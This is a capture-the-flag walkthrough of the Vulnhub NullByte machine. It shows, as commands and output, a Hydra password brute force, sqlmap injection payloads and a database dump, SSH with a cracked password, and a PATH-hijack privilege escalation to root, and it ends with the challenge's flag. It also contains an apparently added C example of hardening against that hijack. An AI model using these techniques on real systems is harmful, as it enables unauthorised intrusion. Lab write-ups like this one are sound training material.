Mr_H4sh

Infosec, CTF and more

NullByte Solution

Hi guys,

this is my solution to the NullByte challenge provided by ly0nx.

Thanks to Vulnhub for keeping me busy with all these challenges, and thanks to everyone that hosts new challenges.

This challenge involves various hacking techniques and privilege escalation.

First step: INFORMATION GATHERING

The description provided on Vulnhub says that the machine will have an IP assigned automatically, so this is the situation:

192.168.56.102 <== attacker
192.168.56.104 <== victim

A port scan on the victim host gives this:

# nmap -sT -p- -v -n -Pn 192.168.56.104 -T5

Nmap scan report for 192.168.56.104
Host is up (0.00064s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
777/tcp   open  multiling-http
57606/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.26 seconds

Second step: VULNERABILITY SCAN

I try to fetch more information by abusing port 111 with a portmap enumeration, but there is nothing interesting there.

I discover that port 777 is an SSH port, but the banner doesn't provide much information.

Port 80 is open, so I open a browser and find this:

[screenshot: harmony-knowledge]

I spider the application with Burp Suite and I find the directory /phpmyadmin, but no default login works.

I use nikto to check the web application for vulnerabilities, but there is nothing interesting.

I download the gif image and run exiftool on it to check for some information, and I have some luck:

# exiftool main.gif 

ExifTool Version Number         : 9.74
File Name                       : main.gif
Directory                       : .
File Size                       : 16 kB
File Modification Date/Time     : 2015:12:26 12:31:46-05:00
File Access Date/Time           : 2015:12:26 12:31:57-05:00
File Inode Change Date/Time     : 2015:12:26 12:31:46-05:00
File Permissions                : rw-r--r--
File Type                       : GIF
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 235
Image Height                    : 302
Has Color Map                   : No
Color Resolution Depth          : 8
Bits Per Pixel                  : 1
Background Color                : 0
Comment                         : P-): kzMb5nVYJw
Image Size                      : 235x302

Third step: EXPLOITATION

I find out that kzMb5nVYJw is a path, so I go to http://192.168.56.104/kzMb5nVYJw and this is what I find:

[screenshot: key-login]

Line 8 of the source code says this:

<!-- this form isn't connected to mysql, password ain't that complex -->

So I try the common simple passwords (admin, password, 123456, god, etc.), but nothing works: I keep receiving the message "invalid key", so I decide to brute-force it using Hydra:

# hydra 192.168.56.104 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l ignore -P /usr/share/wordlists/rockyou.txt

[DATA] attacking service http-post-form on port 80
[80][http-post-form] host: 192.168.56.104   login: ignore   password: elite
1 of 1 target successfully completed, 1 valid password found

And this is the page that I find: [screenshot: search-username]

After some tests I find out that the page is vulnerable to SQL injection.

I use sqlmap to perform some tests, and this is the result:

# sqlmap -u http://192.168.56.104/kzMb5nVYJw/420search.php?usrtosearch=a

Parameter: usrtosearch (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: usrtosearch=" AND 2018=2018#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: usrtosearch=" AND (SELECT * FROM (SELECT(SLEEP(5)))XPld)#

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: usrtosearch=" UNION ALL SELECT CONCAT(0x716b717071,0x515a594a4265696e6a4b,0x7171626a71),NULL,NULL#
---
[09:43:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12

Three SQL injection techniques work, so I go ahead and enumerate the database, the tables and the users:

# sqlmap -u http://192.168.56.104/kzMb5nVYJw/420search.php?usrtosearch=a --current-db

current database:    'seth'

# sqlmap -u http://192.168.56.104/kzMb5nVYJw/420search.php?usrtosearch=a -D seth --tables

[INFO] fetching tables for database: 'seth'
Database: seth
[1 table]
+-------+
| users |
+-------+

# sqlmap -u http://192.168.56.104/kzMb5nVYJw/420search.php?usrtosearch=a -D seth -T users --dump

[INFO] fetching columns for table 'users' in database 'seth'
[INFO] fetching entries for table 'users' in database 'seth'
[INFO] analyzing table dump for possible password hashes
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass                                        | user   | position   |
+----+---------------------------------------------+--------+------------+
| 1  | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank>    |
| 2  | --not allowed--                             | isis   | employee   |
+----+---------------------------------------------+--------+------------+

Cracking the password, I find out that the hash YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE corresponds to the word omega.

Fourth step: PRIVILEGE ESCALATION

At this point I SSH into the system:

# ssh ramses@192.168.56.104 -p 777
ramses@192.168.56.104's password: omega

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug  2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:~$ 

Superb, I'm in, but unfortunately the user ramses is not a sudoer. Thanks ly0nx, I thought it would be easier xD

I check the history of the user, and I find something interesting:

$ cat .bash_history
sudo -s
su eric
exit
ls
clear
cd /var/www
cd backup/
ls
./procwatch 
clear
sudo -s
cd /
ls
exit

The user ramses ran /var/www/backup/procwatch. I run it, and from its output I assume that the program simply runs a ps command (process list) internally and returns the output. Since the file procwatch is owned by root, it will run commands with high privileges. So I create a ps file containing /bin/sh inside the /var/www/backup folder and add that folder to the front of the PATH variable:

ramses@NullByte:/var/www/backup$ echo '/bin/sh' > ps && chmod 777 ps
ramses@NullByte:/var/www/backup$ export PATH=/var/www/backup:${PATH}
ramses@NullByte:/var/www/backup$ ./procwatch 
# whoami 
root
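As an added illustration (not the challenge's own procwatch source, which the walkthrough never shows), the C program below contrasts the `system("ps")` pattern that this PATH trick relies on with a version that executes an absolute path under a scrubbed environment, so the caller's PATH is irrelevant; the guard function, the trusted-directory list and all names are my assumptions.

```c
/* Added example, not the challenge's own procwatch source (which the
 * walkthrough never shows): a privileged "procwatch"-style helper written so
 * that a caller-controlled PATH, as used above, has no effect. */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Fixed environment for the child: PATH is set here, never inherited. */
static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* The pattern the walkthrough abuses: system() hands "ps" to /bin/sh, which
 * resolves it through the caller's PATH, so a writable directory placed in
 * front of /bin wins. Kept only for contrast. */
int procwatch_vulnerable(void) { return system("ps"); }

/* Guard: 1 if cmd is an absolute path under a root-owned binary directory
 * with no ".." component, 0 otherwise (directory list is an assumption). */
int is_trusted_command(const char *cmd)
{
    static const char *const trusted[] = { "/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/" };
    if (cmd == NULL || cmd[0] != '/' || strstr(cmd, "/../") != NULL) return 0;
    for (size_t i = 0; i < sizeof trusted / sizeof trusted[0]; i++)
        if (strncmp(cmd, trusted[i], strlen(trusted[i])) == 0) return 1;
    return 0;
}

/* Hardened version: absolute path, explicit environment, no shell involved.
 * Returns the child's exit status, or -1 for an untrusted command or error. */
int procwatch_hardened(const char *cmd)
{
    if (!is_trusted_command(cmd)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)cmd, NULL };
        execve(cmd, argv, SAFE_ENV);  /* no PATH search, no inherited env */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    return procwatch_hardened("/bin/ps") == 0 ? 0 : 1;
}
```

Even with `PATH=/var/www/backup:...` exported as in the session above, the hardened version still runs /bin/ps, because the lookup never consults the caller's environment.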

Great, I’m root. Time to get the flag.

# ls -l /root
total 4
-rw-r--r-- 1 root root 1170 Aug  2 01:45 proof.txt
# cat /root/proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d

It seems that you have pwned the box, congrats. 
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com


USE THIS PGP PUBLIC KEY


Conclusion

As usual, for any information or comment, please do not hesitate to leave a comment.

./A